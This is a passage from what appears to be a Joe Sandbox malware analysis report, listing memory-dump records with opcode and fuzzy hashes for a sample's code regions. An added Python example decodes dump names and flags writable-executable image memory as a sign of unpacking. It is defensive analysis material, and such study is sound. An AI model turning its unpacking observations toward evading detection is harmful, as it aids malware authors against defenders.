                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: "CJ
                            • API String ID: 0-2498286167
                            • Opcode ID: cd0dbfefc8e2c71302a7b84f83f127ed9136103dadd8dd6e0b7451fb414ae6d9
                            • Instruction ID: e89ec119e185a78efc90b35471fb154e326f18914c86141ef1fb0d5a3ed37c00
                            • Opcode Fuzzy Hash: cd0dbfefc8e2c71302a7b84f83f127ed9136103dadd8dd6e0b7451fb414ae6d9
                            • Instruction Fuzzy Hash: 115127B36187088FE308BF29EC8577AB7E5EB94320F56863DD6C487384FA7455058286
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: b!o
                            • API String ID: 0-3290910009
                            • Opcode ID: e50e86be850d2e83f1ddafb5fc96b315f78f0a880a5165a873fe72ef5085a007
                            • Instruction ID: ee6935513f6e4f22b7e9b0a6aa6437255b7f9b627cdc8c66e50bdc8281e8fe79
                            • Opcode Fuzzy Hash: e50e86be850d2e83f1ddafb5fc96b315f78f0a880a5165a873fe72ef5085a007
                            • Instruction Fuzzy Hash: 2C413BF3A082045FE3146C7DDD84757B7DAEBD4320F2AC63DEA94C7788E93958054692
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                            • Instruction ID: 96146ce65c6ee455b0750796f31ab7640207b09b7f7359ba3eb9af8be34a2028
                            • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                            • Instruction Fuzzy Hash: 6A82F1B5900F448FD365CF29C880B92B7F1BF8A310F548A6ED9EA8B651DB30B549DB50
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                            • Instruction ID: 3da9c1a463e5658f47b09eabb41f13c6db8f43c18fd2416416c3cf83194aad75
                            • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                            • Instruction Fuzzy Hash: 5C42B4716087418FC725CF19C494765BBE2BF49310F28CA6FC48E8B791C6B5E885EB52
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                            • Instruction ID: 77b03217053c9781dfc0145be978ab4d77f47de831889d21b1ffa367415bf334
                            • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                            • Instruction Fuzzy Hash: C002F5B2E002168FDB11CF69C8907BFB7E2AFDA350F15831AE855B7251D770AD819B90
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                            • Instruction ID: 02b8805efbf07c492ebf043a5635ff82bd47461fb2a0de5bfb8ef898a1afa68a
                            • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                            • Instruction Fuzzy Hash: 5402F171A0C3068FDB15EF29C8803B9B7E1AFA5350F18C72DE89997351D7B1E885AB41
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                            • Instruction ID: 4c86b97d0c1f3a69ee4fe100a10d154fac043833c3eff2caae4c6bb1e16d471d
                            • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                            • Instruction Fuzzy Hash: FAF15B6250C6914BC71D9A1888F08BD7FD25BAA201F0EC6ADFDDB0F393D924DA05EB51
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                            • Instruction ID: 46279ceca01b28f499db933c5b5ab84dd453c28a3704225407c365ba22f4ef25
                            • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                            • Instruction Fuzzy Hash: BDD177B3F106254BEB08CA99DC913ADB6E2EBD8350F19413ED516F7385D6F89D018790
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                            • Instruction ID: 5684338bff2c615b76c7b29e0b0eaac5b2eadad739349c5a096d5db07cac8a86
                            • Opcode Fuzzy Hash: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                            • Instruction Fuzzy Hash: 34D1C6B2E002198FDF248F98EC847EDB7B1FF4A320F148229E95577291DB345945EB51
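The dump file names listed under "Associated" and "Source File" encode where each dumped region sat in the process and what page protection it carried. The following is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling, that decodes those names. The field layout is an assumption inferred from the names on this page: the fourth dot-separated field is read as the region base address, the fifth as the Windows PAGE_* protection and the seventh as the MEM_* region type (0x01000000 = MEM_IMAGE); the other fields are carried through undecoded. The PAGE_*/MEM_* constants themselves are the standard winnt.h values. The sample report text is constructed from lines that appear on this page.

```python
"""Decode Joe Sandbox .sdmp dump file names into base address, protection and type.

Added example, not Joe Sandbox code. Field layout is an assumption:
  <proc>.<run>.<dump>.<base>.<protection>.<f6>.<type>.<f8>.sdmp
where only base (field 4), protection (field 5) and type (field 7) are decoded.
"""
from dataclasses import dataclass
import re

# Standard Windows memory protection constants (winnt.h); high bits such as
# PAGE_GUARD (0x100) are modifiers and are masked off before lookup.
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Standard Windows region types (winnt.h).
MEM_IMAGE = 0x1000000
MEM_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# Constructed sample: a few lines copied from the report above.
SAMPLE_REPORT = """\
Memory Dump Source
• Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
"""

# Eight dot-separated hex fields followed by .sdmp.
_SDMP_NAME = re.compile(r"[0-9A-Fa-f]{8}(?:\.[0-9A-Fa-f]+){7}\.sdmp")


@dataclass(frozen=True)
class DumpRegion:
    name: str
    base: int
    protection: int
    mem_type: int

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTIONS.get(self.protection & 0xFF, hex(self.protection))

    @property
    def mem_type_name(self) -> str:
        return MEM_TYPES.get(self.mem_type, hex(self.mem_type))


def parse_sdmp_name(name: str) -> DumpRegion:
    """Split one dump file name into its fields (layout is an assumption, see above)."""
    name = name.strip()
    stem, _, ext = name.rpartition(".")
    fields = stem.split(".")
    if ext != "sdmp" or len(fields) != 8:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    return DumpRegion(
        name=name,
        base=int(fields[3], 16),
        protection=int(fields[4], 16),
        mem_type=int(fields[6], 16),
    )


def extract_dump_names(report_text: str) -> list[str]:
    """Collect every distinct dump name mentioned in a chunk of report text."""
    return sorted(set(_SDMP_NAME.findall(report_text)))


def summarize(report_text: str) -> list[DumpRegion]:
    """Decode all dump names in the text, ordered by base address."""
    return sorted((parse_sdmp_name(n) for n in extract_dump_names(report_text)),
                  key=lambda r: r.base)


def writable_executable_image_regions(regions: list[DumpRegion]) -> list[DumpRegion]:
    """Image-backed regions whose pages are both writable and executable.

    A normally mapped PE has PAGE_EXECUTE_READ code and PAGE_READWRITE data;
    MEM_IMAGE pages that are PAGE_EXECUTE_READWRITE / PAGE_EXECUTE_WRITECOPY
    are what a runtime unpacker or self-modifying image leaves behind.
    """
    return [r for r in regions
            if r.mem_type == MEM_IMAGE and (r.protection & 0xFF) in (0x40, 0x80)]


if __name__ == "__main__":
    for r in summarize(SAMPLE_REPORT):
        print(f"{r.base:#010x}  {r.protection_name:24} {r.mem_type_name}")
    print("writable+executable image regions:",
          [hex(r.base) for r in writable_executable_image_regions(summarize(SAMPLE_REPORT))])
```

Run against the full report text rather than the sample, the same two functions give the complete set of dumped regions and the subset that was writable and executable at dump time; the header page at 00F30000 decodes to PAGE_READWRITE while the code regions decode to PAGE_EXECUTE_READWRITE, which is the memory-level counterpart of the section-rights change the report flags.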
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: same dump files and IDA snapshot file as the preceding record
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                            • Instruction ID: 5f1687ac7e03700c8954432e3d0bd89dd4b34818e61a83b27a7428a2023c76c2
                            • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                            • Instruction Fuzzy Hash: 48028975E006598FCF26CFA8C4905EDBBB6FF8D310F548159E8896B355C730AA91CB90
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: same dump files and IDA snapshot file as the preceding record
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                            • Instruction ID: 5b7cae287787cd50a526a6e44982ee02000a6b2ed1576f8a2b9427d9c23cc2d7
                            • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                            • Instruction Fuzzy Hash: 5B02F275E00A19CFCF15CF98C8809ADB7B6FF88350F258169E849AB355D731AA91CF90
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: same dump files and IDA snapshot file as the preceding record
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                            • Instruction ID: f8f4ec8b98db8b0b57d0904cfafb413140e991879f771748d505931a029485ad
                            • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                            • Instruction Fuzzy Hash: 35C16DB6E29B824BD713873DD802265F395AFE7290F15D72EFCE472942FB2096858204
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: same dump files and IDA snapshot file as the preceding record
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                            • Instruction ID: b037907b18b22f8e820c17874c44682e5c619aa83e8ca7e4e6ed2b69c6efcc75
                            • Opcode Fuzzy Hash: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                            • Instruction Fuzzy Hash: F9B12636D052999FEF25CB64C4503EDBFB2AF53394F18815AD4446B282DB348D87E790
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: same dump files and IDA snapshot file as the preceding record
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                            • Instruction ID: 9a4c7c893ef68bd37fc19063afcfdef14014379f8514975a96f98ff2505be605
                            • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                            • Instruction Fuzzy Hash: FFD13970A00B40CFEB25CF29C994B67B7E0BB49314F14892ED49A8BB51DB35E845DB91
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: same dump files and IDA snapshot file as the preceding record
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                            • Instruction ID: 7cc32e907bfb42079bd117bb592d54c2ec83aa16f360de76e8a8aa3e8bb33146
                            • Opcode Fuzzy Hash: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                            • Instruction Fuzzy Hash: 3DD14CB050C3908FD7149F15C4A476BBFE0AF95718F18899EE4D90B391C7BA8948EF92
                            Memory Dump Source
